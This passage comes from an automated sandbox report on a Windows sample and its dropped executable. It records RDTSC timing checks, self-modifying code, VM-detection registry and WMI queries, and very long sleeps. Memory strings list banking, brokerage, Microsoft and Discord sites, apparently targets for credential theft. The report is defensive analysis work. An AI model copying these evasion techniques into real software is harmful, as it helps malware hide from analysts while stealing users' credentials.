Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FC4078 second address: FC4086 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FC4086 second address: FC408A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD27D1 second address: FD27E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FFA707966D8h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD27E4 second address: FD27EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD27EA second address: FD27F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD27F2 second address: FD27F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD27F8 second address: FD2812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFA707966E1h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD2ACD second address: FD2AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD2AD5 second address: FD2AFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FFA707966DCh 0x0000000b jng 00007FFA707966D6h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FFA707966DEh 0x00000019 push edi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD2AFA second address: FD2B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA70D2D1AAh 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD2B09 second address: FD2B17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD2B17 second address: FD2B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD3063 second address: FD306B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD306B second address: FD307B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA70D2D1ACh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD307B second address: FD308D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD308D second address: FD30B7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnc 00007FFA70D2D1A6h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFA70D2D1ABh 0x00000011 jmp 00007FFA70D2D1B3h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD30B7 second address: FD30BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD34A4 second address: FD34B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA70D2D1B1h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD3F82 second address: FD3FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jg 00007FFA707966D6h 0x0000000e pop eax 0x0000000f jmp 00007FFA707966DCh 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD3FA3 second address: FD3FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD40F4 second address: FD4104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007FFA707966D6h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD4291 second address: FD4297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD4297 second address: FD42A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFA707966DBh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD42A9 second address: FD42B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FFA70D2D1A6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: F987D5 second address: F987D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD96BA second address: FD96C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD96C0 second address: FD96C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD9D71 second address: FD9D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFA70D2D1B7h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD9D90 second address: FD9D95 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD9D95 second address: FD9DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFA70D2D1B2h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD9DB4 second address: FD9DE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFA707966E0h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD9DE4 second address: FD9DF9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFA70D2D1A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD9DF9 second address: FD9DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD9DFE second address: FD9E08 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFA70D2D1ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FD8495 second address: FD8499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: F9F073 second address: F9F08A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFA70D2D1AFh 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: F9F08A second address: F9F08E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FDE476 second address: FDE4AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FFA70D2D1A6h 0x00000009 jmp 00007FFA70D2D1AAh 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FFA70D2D1B6h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jg 00007FFA70D2D1A6h 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FDE61C second address: FDE62C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FFA707966DCh 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FDE783 second address: FDE787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FDE8DE second address: FDE8F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FFA707966D6h 0x0000000a popad 0x0000000b jg 00007FFA707966DAh 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 push ecx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FDE8F8 second address: FDE91B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA70D2D1AEh 0x00000009 pushad 0x0000000a popad 0x0000000b je 00007FFA70D2D1A6h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007FFA70D2D1A6h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FDEEF3 second address: FDEEF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FE113C second address: FE1140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FE14E9 second address: FE14ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FE14ED second address: FE1508 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA70D2D1B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FE190B second address: FE1915 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FE19AA second address: FE1A0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA70D2D1B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebx 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FFA70D2D1A8h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D2821h], ecx 0x0000002b nop 0x0000002c jg 00007FFA70D2D1AAh 0x00000032 push eax 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FFA70D2D1B2h 0x0000003b rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FE1C16 second address: FE1C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FE1C1A second address: FE1C28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA70D2D1AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FE1C28 second address: FE1C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FE1C2E second address: FE1C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FE1C32 second address: FE1C49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 je 00007FFA707966E2h 0x0000000f jns 00007FFA707966DCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FE1D3B second address: FE1D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	RDTSC instruction interceptor: First address: FE2DE7 second address: FE2DF1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 92FE45 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 9587D9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 78EC75 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 937DAD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Special instruction interceptor: First address: E3DBFF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Special instruction interceptor: First address: FECA59 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Special instruction interceptor: First address: 107BE02 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Special instruction interceptor: First address: E41684 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Memory allocated: 54B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Memory allocated: 57E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Memory allocated: 5630000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe

Code function: 4_2_00FAF0F0 rdtsc

4_2_00FAF0F0

Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 2156	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe TID: 6072	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: file.exe, 00000000.00000002.2358566930.000000000090F000.00000040.00000001.01000000.00000003.sdmp, ZXCELRXK9FXBC48TJDYH4AM8OTM.exe, ZXCELRXK9FXBC48TJDYH4AM8OTM.exe, 00000004.00000002.2499817397.0000000000FB9000.00000040.00000001.01000000.00000006.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: file.exe, 00000000.00000002.2361476946.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2361476946.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: file.exe, 00000000.00000003.2211856887.0000000005262000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696487552p
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: file.exe, 00000000.00000003.2211856887.000000000525D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000000.00000002.2358566930.000000000090F000.00000040.00000001.01000000.00000003.sdmp, ZXCELRXK9FXBC48TJDYH4AM8OTM.exe, 00000004.00000002.2499817397.0000000000FB9000.00000040.00000001.01000000.00000006.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
